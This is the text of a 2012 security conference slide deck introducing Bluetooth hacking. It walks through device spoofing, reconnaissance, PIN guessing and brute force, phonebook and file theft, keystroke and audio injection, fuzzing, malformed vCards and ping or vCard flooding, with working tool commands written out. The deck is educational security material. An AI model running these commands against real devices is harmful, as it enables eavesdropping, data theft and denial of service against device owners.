JP Dunning (.ronin)CarolinaCon 8

March 11-13, 2012

An Introduction to Bluetooth Hacking

Bluetooth

● IEEE 802.15.1● Released 1999

● Version 1.0 first release● Standards controlled by Bluetooth SIG

● Low Power / Low Data Rate / Short Range● Ideal for use in place of USB, PS/2, Serial,

Audio Cables, etc● Included in Billions of Devices

● Many of them portable or embedded

Bluetooth Versions

Version Release Updated Features

1.0 1999 Initial release

1.1 2001 Unencrypted options

1.2 2003 FHSS, Rate 721 Kbs

2.0 2004 Rate 2.1 Mbs

2.1 2007 Improved Security

3.0 2009 AMP adds 24 Mbs rate, 802.11 transport

4.0 2010 Low Power, Redefining Protocols

Topology

● Star network topology● Ad-Hoc (Piconet)

● Master / Slave● Master controls the network

– Sets things like clock cycles● Master can have up to 7 slave devices● Slave can only have one Master

● Either device can initial pairing

Security

● Authentication● Initial pairing with a PassKey● Further authentication with Link Key

● Encryption● Traffic encrypted during transit

● Authorization● Varying levels of Trust

Linux Bluetooth Basics

● BlueZ Bluetooth Stack ● Recommend compile from source with flags to

install additional services● Some of the Tools

● Hciconfig - Configure interface settings● Hcitool - Configure connections● Blutoothd - Bluetooth Daemon● Sdptool - Service discovery● Simple-agent - Pairing

Equipment

● Adapter● Parani UD100

● Antenna● Use the same antenna equipment as Wi-Fi

● ChipSet● Cambridge Silicon Radio (CSR)

● Version● Version 2.1 (3.0 and 4.0 starting to come out)

Scanning

● Scan for devices Discoverable Mode● Device listens for remote Inquiries● Device not listening will not respond to scans

# hcitool -i hci0 scan --flush --class

BD Address: E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]

Device name: Bob's Laptop [cached]

Device class: Computer, Laptop (0x3a010c)

Access Profile

● Device Address: unique identifier● Example: 00:11:22:33:44:55

● Class of Device (CoD): 24-bit value● Services: Identifies types of services● Major Device Class: High level of device● Minor Device Class: More granular

● Device Name: Human readable identifier● Example: “Motorola Headset”

Spoofing

● Bluetooth Profile:● Device Address, Device Class, Device Name

● Bluetooth Profile Cloning:● Modify host Bluetooth Adapter profile to match

the profile of another device● Bluetooth Profile Spoofing:

● Creating a misleading profile of host Bluetooth Adapter

SpoofTooph

● Scan local area for devices● Save list of devices found● Select a device from the list to clone

# spooftooph -i hci0 -s -w scan.log

SpoofTooph

War-Nibbling

● Kismet has Bluetooth btscan plugin

War-Nibbling

BT Device 1: BDADDR 00:05:4F:00:00:00

 Class      : 0x30040

 Name       : StreetPilot c550

 Seen       : 1

 Manuf      : Private

 First      : Thu May 10 16:07:50 2012

 Last       : Thu May 10 16:07:50 2012

 Min Pos    : Lat 35.997002 Lon ­78.909752 Alt 129.585999 Spd 0.000000

 Max Pos    : Lat 35.997002 Lon ­78.909752 Alt 129.585999 Spd 0.000000

 Avg Pos    : AvgLat 35.997002 AvgLon ­78.909752 AvgAlt 129.585900

War-Nibbling

War-Nibbling

War-Nibbling

Service Discovery

● Service Discovery Protocol (SDP)● Lists available services on device

● Service name● L2CAP “port”● RFCOMM “port”

● Generally available without authentication

Service Discovery

# sdptool -i hci0 browse xx:xx:xx:xx:xx:xx...Service Name: File Transfer serverService RecHandle: 0x10000Service Class ID List: "OBEX File Transfer" (0x1106)Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 10 "OBEX" (0x0008)Profile Descriptor List: "OBEX File Transfer" (0x1106) Version: 0x0100

Port Scan

● Find open ports with listening services● Similar to NMAP

● psm_scan ● Scan open L2CAP “ports”

# psm_scan ­i hci0 ­s 1 ­e 101 xx:xx:xx:xx:xx:xx

● rfcomm_scan● Scan open RFCOMM “ports”

# rfcomm_scan ­i hci0 ­s 1 ­e 30 xx:xx:xx:xx:xx:xx

CavitySearch

● *Tool Release*● Streamline the info gathering process● Conduct recon for HCI Info, SDP, L2CAP, and

RFComm● Aggregate into a single log file

CavitySearch

# cavitysearch hci0 11:22:33:44:55:66

Gathering device info into 11_22_33_44_55_66/hciinfo.log ...

Gathering device scan into 11_22_33_44_55_66/scan.log ...

Gathering SDP into 11_22_33_44_55_66/sdp.log ...

Gathering PSMs 1 ­ 101 into 11_22_33_44_55_66/psm.log ...

Gathering RFCOMMs 1 ­ 30 into 11_22_33_44_55_66/rfcomm.log ...

Generating profile in 11_22_33_44_55_66/profile.log ...

Logs saved in 11_22_33_44_55_66/ directory.

...done.

Bluetooth Identity

Bluetooth Class● Type of Device

– Assist in determining physical device

● List Services– Networking, Telephony, & Object Transfer

Bluetooth Name● Use human name for Social Engineering● Use model name to determine possible attack vectors

Bluetooth Address● Devices are assigned address in blocks● The same models are within a limited range

Bluetooth Profiling Project

● Bluetooth Profiling Project (BlueProPro)● Collect Device Name, Device Address and

Device Class on as many devices as possible● Same idea as Josh Wright's Bnap,Bnap, but

collecting device profiles from others devices instead

● Collected over 1,500 device profiles so far● 1,000 profiles posted as of 07/29/2010

Bluetooth Profiling Project

Percentage of devices names which disclosed sensitive information (out of the 1,500 profiles collected)

First Name

Last Name

Location Device Model

Nickname / Handle

28.17% 18.76% 1.30% 70.54% 1.51%

Sniffing

HCIDump ● Similar to TCPDump to capture traffic on host# hcidump ­i hci0 ­R ­w btdump.cap

Wireshark● View and examine capture# wireshark ­r btdump.cap

Wireshark

Ubertooth

Kismet● Capture portions of Bluetooth traffic● Find Bluetooth device in local area

Bluetooth_RXTX● Find Bluetooth device in local area● Brute force UAP portion of Device Address

Spescan● Spectrum analysis

Ubertooth

Ubertooth

Find Non-Discoverable

● Previous Contact● Have prier knowledge of the Device Address

● Labels● Some device print the Device Address on the

box or casing

● Redfang● Scans 248 (232) possible Device Addresses● Takes years

Find Non-Discoverable

● Only need LAP and UAP portions of the device address

● Ubertooth-lap extracts lap# ubertooth­lap

● Ubertooth-uap calculates uap# ubertooth­uap

DEMO

Pairing

● Guess PassKey● Commonly PassKeys are 4 digits

– Best chances: 0000, 1234, 9999

# simple­agent hci0 xx:xx:xx:xx:xx  RequestPinCode (/org/bluez/2/hci0/dev xx_xx_xx_xx_xx_xx)   Enter PIN Code: 

Pairing

● Trick User by changing the profile to one the user recognizes

● Post signs requesting connections as advertizing or local information

Pairing

● Chomp● Bluetooth specification attempts to counteract

brute force● Attempts different PassKeys● Changes Device Address between attempts● Provide a file with possible PassKeys

# chomp xx:xx:xx:xx:xx:xx passkeys

Common Services

● File Transfer Profile (FTP)● Object Push Profile (OPP)● Human Interaction Device (HID)● Hands Free (HF)● Personal Area Network (PAN)

OPP

● Specific files like phonebooks and calenders● Bluebugger

– dump phonebook

# bluebugger ­c 3 ­a xx:xx:xx:xx:xx:xx phonebook

● Specific tools● Bluesnarfer, btxml, btobex, bloover, helomoto

FTP

● FTP facilitates the exchanging file● Obexfs mounts a remote folder over FTP● Interact like files are stored locally

# mkdir btdir

# obexfs ­b xx:xx:xx:xx:xx:xx ­c 3 btdir/

# ls btdir

Passwords.xls Taxes.pdf

HID

● HID is used for various types of human iteration device such as mice and keyboards.

● Inject keystrokes by acting as a keyboard● Stuffkeys

● Keystrokes hard coded● Default “who controls your keystrokes?”

# stuffkeys ­a xx:xx:xx:xx:xx:xx ­b yy:yy:yy:yy:yy:yy

HF

● Inject and receive audio● Carwhisperer# hciconfig hci0 voice 0x0060

# carwhisperer ­i hci0 in.raw out.raw 4

● HSTest# hstest record in.raw xx:xx:xx:xx:xx:xx 4

PAN

● Creates a TCP/IP network over Bluetooth● Interact like it is WiFi or Ethernet

# pand ­­connect xx:xx:xx:xx:xx:xx ­­persist ­­encrypt ­­role=PANU

# ifconfig

...

pan0      Link encap:Ethernet  HWaddr yy:yy:yy:yy:yy:yy  

...

Fuzzing

● Bluetooth Stack Smasher● Fuzz L2CAP packets● Attempts to crash Bluetooth Stack

– Generates code for suspected crashes● Takes about half an hour to run

# bss –i hci0 ­s 100 ­m 12 ­M 0 xx:xx:xx:xx:xx:xx

vCards

● Virtual Business Card● Adds information to contacts

● BlueJacking● Sending messages by vCard● Set the name field to the message

● Nasty vCard● Send a malformed vCard

# ussp­push xx:xx:xx:xx:xx:xx nasty.vcf bob.vcf

DoS

● L2Ping Flood● Send a constant flood of ping packets

# l2ping ­i hci0 ­f xx:xx:xx:xx:xx:xx

● vCard Flood● Fill up address book with contacts

# vcblaster ­c 100 ­g xx:xx:xx:xx:xx:xx

PwnTooth

● Bundle of Bluetooth attack tools● Designed to automate multiple attacks against

multiple targets.● If a address device is detected in multiple

iterations of scans, the attacks listed in the config file are only run the first time

# pwntooth ­l logfile.txt ­s 10

PwnTooth

DEMO

Recap

● Setup ● Configure interface

● Recon● Gather information on device and services

● Connect● Authenticate or connect to open services

● Interact ● Access resources

● Attack● Test reliability through fuzzing and DoS

Q&A

JP DunningTwitter: r0wninEmail: ronin <At> shadowcave <d0t> orgWeb: www.hackfromacave.com